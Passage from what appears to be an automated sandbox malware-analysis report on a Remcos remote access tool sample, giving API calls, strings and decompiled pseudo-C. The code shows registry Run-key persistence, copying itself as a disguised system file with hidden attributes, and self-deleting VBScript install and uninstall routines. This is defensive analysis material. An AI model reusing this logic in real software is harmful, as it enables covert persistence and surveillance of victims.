0x0040b151
0x0040b152
0x0040b158
0x0040b169
0x0040b16e
0x0040b16f
0x0040b175
0x0040b189
0x0040b18e
0x0040b196
0x0040b19e
0x0040b1c4
0x0040b1ce
0x0040b1d0
0x0040b1db
0x0040b1db
0x0040b1ee
0x0040b206
0x0040b211
0x0040b216
0x0040b218
0x0040b21b
0x0040b220
0x0040b222
0x0040b229
0x0040b234
0x0040b234
0x0040b254
0x0040b25d
0x0040b278
0x0040b281
0x0040b286
0x0040b288
0x0040b2bc
0x0040b2c4
0x0040b2cc
0x0040b2d4
0x0040b2d4
0x0040b30c
0x0040b314
0x0040b31c
0x0040b324
0x0040b329
0x0040b32b
0x0040b335
0x0040b335
0x0040b348
0x0040b34d
0x0040b34f
0x0040b374
0x0040b37c
0x0040b384
0x0040b384
0x0040b399
0x0040b3d8
0x0040b3e0
0x0040b3e8
0x0040b3f0
0x0040b3fb
0x0040b406
0x0040b413
0x0040b41c
0x0040b425
0x0040b443
0x0040b463
0x0040b463
0x0040b46c
0x0040b474
0x0040b487

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234

Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4

Part of subcall function 00417947: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
ExitProcess.KERNEL32 ref: 0040B463

Strings

\update.vbs, xrefs: 0040B236
fso.DeleteFolder ", xrefs: 0040B357
fso.DeleteFile ", xrefs: 0040B2E5
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B3A3
open, xrefs: 0040B451
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B130
On Error Resume Next, xrefs: 0040B270
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B262
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B40B
Remcos, xrefs: 0040B12B
exepath, xrefs: 0040B1B6
while fso.FileExists(", xrefs: 0040B29F
Temp, xrefs: 0040B23B
"), xrefs: 0040B28A
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B17F
""", 0, xrefs: 0040B38E
wend, xrefs: 0040B32D

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: 9f1ddf6c3ccc6586a5b655a8465a71ab972eb67ecf77d1146ad88ffbecc94b59
Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
Opcode Fuzzy Hash: 9f1ddf6c3ccc6586a5b655a8465a71ab972eb67ecf77d1146ad88ffbecc94b59
Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D

Uniqueness

Uniqueness Score: -1.00%

Function 004169CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004169CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(L00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401EEB( &_a4);
					_t103 = 0x30;
					L00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
					L00401EF0();
				}
				_t25 = E00402489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
						_push(0xa8);
						E00404AA4(_t67, 0x46ca18, _t103, __eflags);
					}
				} else {
					_t60 = L00401EEB( &_a4);
					_t118 = _t114 - 0x18;
					E004020EC(_t67, _t118, _t103, _t120, _t109);
					E00417A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E004172DA( &_v124, _t67);
					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, L00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401EF0();
					L00401EF0();
					L00401EF0();
					L00401EF0();
					mciSendStringW(L00401EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402084(0, _t114 - 0x18, 0x45f6bc);
					_push(0xa9);
					E00404AA4(0, 0x46ca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402084(0, _t115 - 0x18, 0x45f6bc);
						_push(0xaa);
						E00404AA4(0, 0x46ca18, _t108, _t122);
						L00401EF0();
						goto L21;
					}
				}
				L21:
				return L00401EF0();
			}

0x004169cc
0x004169d6
0x004169d8
0x004169e6
0x004169eb
0x004169f1
0x00416a00
0x00416a08
0x00416a08
0x00416a0f
0x00416a17
0x00416a19
0x00416b06
0x00416b08
0x00000000
0x00416b0e
0x00416b18
0x00416b1d
0x00416b27
0x00416b27
0x00416a1f
0x00416a1f
0x00416a24
0x00416a2c
0x00416a33
0x00416a38
0x00416a3b
0x00416a45
0x00416a78
0x00416a7d
0x00416a86
0x00416a8e
0x00416a96
0x00416a9e
0x00416ab1
0x00416ac5
0x00416ac7
0x00416ad1
0x00416ad6
0x00416ae0
0x00416aea
0x00416af0
0x00416af0
0x00416af0
0x00416bc1
0x00416bc1
0x00416bc3
0x00000000
0x00000000
0x00416b31
0x00416b37
0x00416b41
0x00416b43
0x00416b43
0x00416b49
0x00416b4f
0x00416b59
0x00416b5b
0x00416b5b
0x00416b6d
0x00416b6f
0x00416b72
0x00416b77
0x00416b79
0x00416b7d
0x00416b80
0x00000000
0x00000000
0x00416b82
0x00416b83
0x00416b86
0x00000000
0x00416b88
0x00416b8e
0x00416b8e
0x00000000
0x00416b86
0x00416ba5
0x00416ba7
0x00416bbc
0x00416ba9
0x00416baf
0x00416bb5
0x00000000
0x00416bb5
0x00416ba7
0x00416bd1
0x00416bdb
0x00416be7
0x00416bec
0x00416bf6
0x00416bfe
0x00000000
0x00416bfe
0x00416af0
0x00416c03
0x00416c11

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
SetEvent.KERNEL32 ref: 00416B8E
WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
CloseHandle.KERNEL32 ref: 00416BAF
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB

Strings

stop audio, xrefs: 00416BCC
open ", xrefs: 00416A4E
alias audio, xrefs: 00416A3B
stopped, xrefs: 00416B72
close audio, xrefs: 00416BD6
pause audio, xrefs: 00416B3C
" type , xrefs: 00416A53
resume audio, xrefs: 00416B54
play audio, xrefs: 00416AC0
status audio mode, xrefs: 00416B68

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
Opcode Fuzzy Hash: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401A64(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00401a73
0x00401a76
0x00401a7d
0x00401a80
0x00401a87
0x00401a9a
0x00401a9f
0x00401ab0
0x00401ab8
0x00401ac3
0x00401ac9
0x00401ad2
0x00401ad7
0x00401af3
0x00401b02
0x00401b12
0x00401b22
0x00401b31
0x00401b40
0x00401b50
0x00401b60
0x00401b6f
0x00401b7e
0x00401b8e
0x00401b9e
0x00401bad
0x00401bbb
0x00401bbe
0x00000000
0x00401bc4
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B12
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B22
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B31
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B50
WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B60
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401BAD

Strings

RIFF, xrefs: 00401AED
data, xrefs: 00401B98
fmt , xrefs: 00401B1C
WAVE, xrefs: 00401B0C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction ID: 7cb0b37bd81af4d905286dd476bd08579b6e0b57ecfaa18f48c35616be89f383
Opcode Fuzzy Hash: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
Instruction Fuzzy Hash: DE413DB1A50218BAE710DA918C86FFFBBBCDB45B50F500066FB04EA0C0D7B45A05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A987, Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E0041805B( &_v92, __ecx, _t143);
					_t259 = 0x46c500;
					L00401EFA(0x46c500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(L00401EEB(0x46c530), 0);
					_t143 = _a4;
					_t139 = E004030A6(_t143,  &_v92, E00407514( &_v44, 0x46c530, _t268, "\\"), 0x46c530, _t268, _t143);
					_t259 = 0x46c500;
					L00401EFA(0x46c500, _t138, _t260, _t139);
					L00401EF0();
				}
				L00401EF0();
				_t152 = L00401EEB(_t259);
				_t67 = 0x46bb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Windows\SysWOW64\logagent.exe", L00401EEB(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E004030A6(_t143,  &_v92, E0040427F(_t143,  &_v68, E0043987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									L00401EF0();
									E0040427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0040766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E0040427F("\n",  &_v212, "C:\Windows\SysWOW64\logagent.exe");
										E00403311(E004030A6(_t144,  &_v68, E004030A6(_t144,  &_v116, E00403030( &_v140, E004030A6(_t144,  &_v164, E0040427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
										L00401EF0();
									}
									_t79 = E0040427F(_t144,  &_v116, L"\"\"\", 0");
									E00403311(E004030A6(_t144,  &_v212, E00403030( &_v188, E00404429(_t144,  &_v164, E0040427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									L00401EF0();
									L00401EF0();
									L00401EF0();
									L00401EF0();
									L00401EF0();
									E0040766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = L00401EEB( &_v92);
									_t92 = E00402489();
									_t94 = E00417947(L00401EEB( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										L00401EF0();
										return L00401EF0();
									} else {
										_t99 = ShellExecuteW(0, L"open", L00401EEB( &_v92), 0x45f724, 0x45f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = L00401EEB(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46c530;
									SetFileAttributesW(L00401EEB(0x46c530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								L00401EFA(_t259, 0x36, _t260, E0041805B( &_v68, 0x36));
							} else {
								L00401EFA(_t259, _t128, _t260, E004030A6(_t143,  &_v140, E004030A6(_t143,  &_v116, E0041805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								L00401EF0();
								L00401EF0();
							}
							L00401EF0();
							_t123 = L00401EEB(_t259);
							_t143 = 0x46bb08;
							_t124 = CopyFileW(0x46bb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								L00409DC9(0x46bb08, _t259, 0x46bb08);
								return 0;
							}
						}
						E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x0040a987
0x0040a994
0x0040a998
0x0040a99a
0x0040a99d
0x0040a9a0
0x0040a9a0
0x0040a9a3
0x0040a9a6
0x0040a9ab
0x0040a9ab
0x0040a9b4
0x0040a9fe
0x0040aa01
0x0040aa07
0x0040aa0d
0x0040aa15
0x0040a9b6
0x0040a9bf
0x0040a9c5
0x0040a9de
0x0040a9e4
0x0040a9ec
0x0040a9f4
0x0040a9f9
0x0040aa1d
0x0040aa29
0x0040aa2b
0x0040aa30
0x0040aa30
0x0040aa36
0x00000000
0x00000000
0x0040aa3b
0x0040aa52
0x0040aa52
0x0040aa54
0x0040aa5f
0x0040aa61
0x0040aa8b
0x0040aa91
0x0040aa93
0x0040ab42
0x0040ab4e
0x0040ab53
0x0040ab58
0x0040ab59
0x0040ab92
0x0040abb0
0x0040abb9
0x0040abc6
0x0040abd3
0x0040abd8
0x0040abdc
0x0040abe1
0x0040abf9
0x0040ac46
0x0040ac4e
0x0040ac56
0x0040ac61
0x0040ac6c
0x0040ac77
0x0040ac82
0x0040ac82
0x0040ac90
0x0040acd2
0x0040acdd
0x0040ace8
0x0040acf3
0x0040acfb
0x0040ad03
0x0040ad10
0x0040ad1b
0x0040ad24
0x0040ad39
0x0040ad40
0x0040ad42
0x0040ad6d
0x0040ad70
0x00000000
0x0040ad44
0x0040ad5b
0x0040ad61
0x0040ad64
0x00000000
0x00000000
0x0040ad67
0x0040ad67
0x0040ad42
0x0040ab5f
0x0040ab64
0x0040ab6b
0x0040ab6d
0x0040ab70
0x0040ab70
0x0040ab72
0x0040ab72
0x0040ab75
0x0040ab78
0x0040ab78
0x0040ab7d
0x0040ab81
0x0040ab85
0x0040ab90
0x0040ab90
0x00000000
0x0040ab81
0x0040aa99
0x0040aa9d
0x00000000
0x00000000
0x0040aaa3
0x0040aaa5
0x0040aaa8
0x0040aaa8
0x0040aaab
0x0040aaae
0x0040aaae
0x0040aab4
0x0040aab4
0x0040aaba
0x0040aabe
0x0040ab0b
0x0040aac0
0x0040aae8
0x0040aaf3
0x0040aafb
0x0040aafb
0x0040ab13
0x0040ab1d
0x0040ab23
0x0040ab29
0x0040ab2f
0x0040ab31
0x00000000
0x0040ab33
0x0040ab36
0x00000000
0x0040ab3b
0x0040ab31
0x0040aa6f
0x00000000
0x0040aa76
0x0040aa3d
0x0040aa45
0x00000000
0x00000000
0x0040aa47
0x0040aa4a
0x0040aa50
0x00000000
0x00000000
0x00000000
0x0040aa50
0x0040aa58
0x0040aa5a
0x0040aa5d
0x0040aa5d
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A9BF
CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AA8B
CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AB29

Part of subcall function 0041805B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB6B
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB90
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040AD5B
ExitProcess.KERNEL32 ref: 0040AD67

Strings

fso.DeleteFile , xrefs: 0040AC00
6, xrefs: 0040AA99
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040ABCB
WScript.Sleep 1000, xrefs: 0040ABBE
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040AD08
Remcos, xrefs: 0040AA63, 0040AB42
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040AC97
Temp, xrefs: 0040AB97
open, xrefs: 0040AD55
C:\Windows\SysWOW64\logagent.exe, xrefs: 0040AA2B, 0040AA86, 0040AB23, 0040AB28, 0040AB33, 0040ABF4
""", 0, xrefs: 0040AC88
\install.vbs, xrefs: 0040AB92

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
String ID: """, 0$6$C:\Windows\SysWOW64\logagent.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 4018752923-3679637522
Opcode ID: fa7387df971ea75b2a4ad45fa2b92c18d131a3302fff54c551d3277769ff4301
Instruction ID: 190cd27c0b7bf58ebe4b0d8389cb7e98ba8e890002f8b4040f3ff986190cfdad
Opcode Fuzzy Hash: fa7387df971ea75b2a4ad45fa2b92c18d131a3302fff54c551d3277769ff4301
Instruction Fuzzy Hash: C4A1637160020456CB28FBA5DC92AFF737AAF54344F54407FF806B61D2EE386E46C66A

Uniqueness

Uniqueness Score: -1.00%

Function 004476AD, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004476AD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = L00434F60(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0043A504())) = 0x16;
						goto L11;
					} else {
